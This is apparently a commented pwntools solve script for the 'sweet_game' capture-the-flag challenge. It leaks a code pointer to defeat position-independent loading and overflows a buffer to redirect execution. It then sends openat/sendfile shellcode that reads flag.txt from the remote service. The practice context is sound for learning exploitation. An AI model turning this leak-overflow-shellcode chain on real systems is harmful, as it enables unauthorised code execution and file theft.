#!/usr/bin/python3
"""Solve script for the ``sweet_game`` challenge binary (pwntools).

Three stages, in the order they are driven below:

1. Leak   - a 66-byte fill is sent; the service's reply contains that fill
            followed by 6 bytes which the script interprets as the runtime
            address of ``main``. The image base is derived from it.
2. Jump   - 48 filler bytes followed by the computed ``call_shellcode``
            address are sent as the second input.
3. Stub   - an ``openat`` + ``sendfile`` stub with the file name appended is
            sent as the third input.

NOTE(review): the binary itself is not on this page. Why the reply carries a
code pointer (presumably an unterminated buffer being echoed) and what the
8 bytes at offset 48 overwrite are inferred from the script; confirm against
the target.
"""
from pwn import *

# Offsets inside the ELF image, taken from the original script.
MAIN_OFFSET = 0x15bc
CALL_SHELLCODE_OFFSET = 0x16d2

# Fill lengths used by the two overflowing inputs.
LEAK_FILL = b"A" * 66
PAD_TO_TARGET = 48

target = ELF("./sweet_game", checksec=False)
context.binary = target  # selects arch/bits for asm(), u64() and p64()

# io = process()  # local run against ./sweet_game instead of the remote service
io = remote("challenge.bugpwn.com", 1001)

# --- Stage 1: address leak -------------------------------------------------
io.sendafter(b": ", LEAK_FILL)
io.recvuntil(LEAK_FILL)
# Only 6 bytes are read: the top two bytes of a user-space x86-64 address are
# zero, so the value is padded back to 8 bytes before unpacking.
leaked = io.recv(6).ljust(8, b"\x00")
main = u64(leaked)
log.info("main: 0x%lx", main)

# With one code pointer disclosed, every other address in the image follows
# by fixed offsets; position-independent loading no longer hides them.
elf_base = main - MAIN_OFFSET
log.info("elf_base: 0x%lx", elf_base)

call_shellcode = elf_base + CALL_SHELLCODE_OFFSET
log.info("call_shellcode: 0x%lx", call_shellcode)

# --- Stage 2: control-flow redirect ----------------------------------------
redirect = b"A" * PAD_TO_TARGET + p64(call_shellcode)
io.sendlineafter(b": ", redirect)

# --- Stage 3: openat + sendfile stub ---------------------------------------
# The assembly text is handed to asm() unchanged. What it encodes:
#
#   openat(AT_FDCWD, path, 0, 0)
#     lea rsi, [rdx+38]  path = the string appended after the stub; assumes
#                        rdx holds the stub's own address on entry and that
#                        38 equals the assembled stub length - TODO confirm
#     mov edi, -100      AT_FDCWD
#     xor rdx / xor r10  flags = 0, mode = 0
#     add ax, 257        syscall 257 (openat) only if rax is 0 on entry
#   sendfile(1, fd, NULL, 255)
#     mov rsi, rax       in_fd = descriptor returned by openat (the xor
#                        before it is redundant but counts towards the 38)
#     mov al, 40         syscall 40 (sendfile); relies on the fd being < 256
#     shr edi, 255       shift count is masked to 31 for a 32-bit operand,
#                        so 0xffffff9c >> 31 == 1 (stdout)
#     add r10b, 255      count = 255 bytes; rdx is still 0 (no offset ptr)
#
# NOTE(review): the indirect encodings suggest the target restricts some
# bytes, instructions or syscalls; that filter is not visible here.
stub_source = """
lea rsi, [rdx+38]
mov edi, -100
xor rdx, rdx
xor r10, r10
add ax, 257
syscall
xor rsi, rsi
mov rsi, rax
mov al, 40
shr edi, 255
add r10b, 255
syscall
"""
shellcode = asm(stub_source) + b"flag.txt\0"
io.sendlineafter(b": ", shellcode)

io.interactive()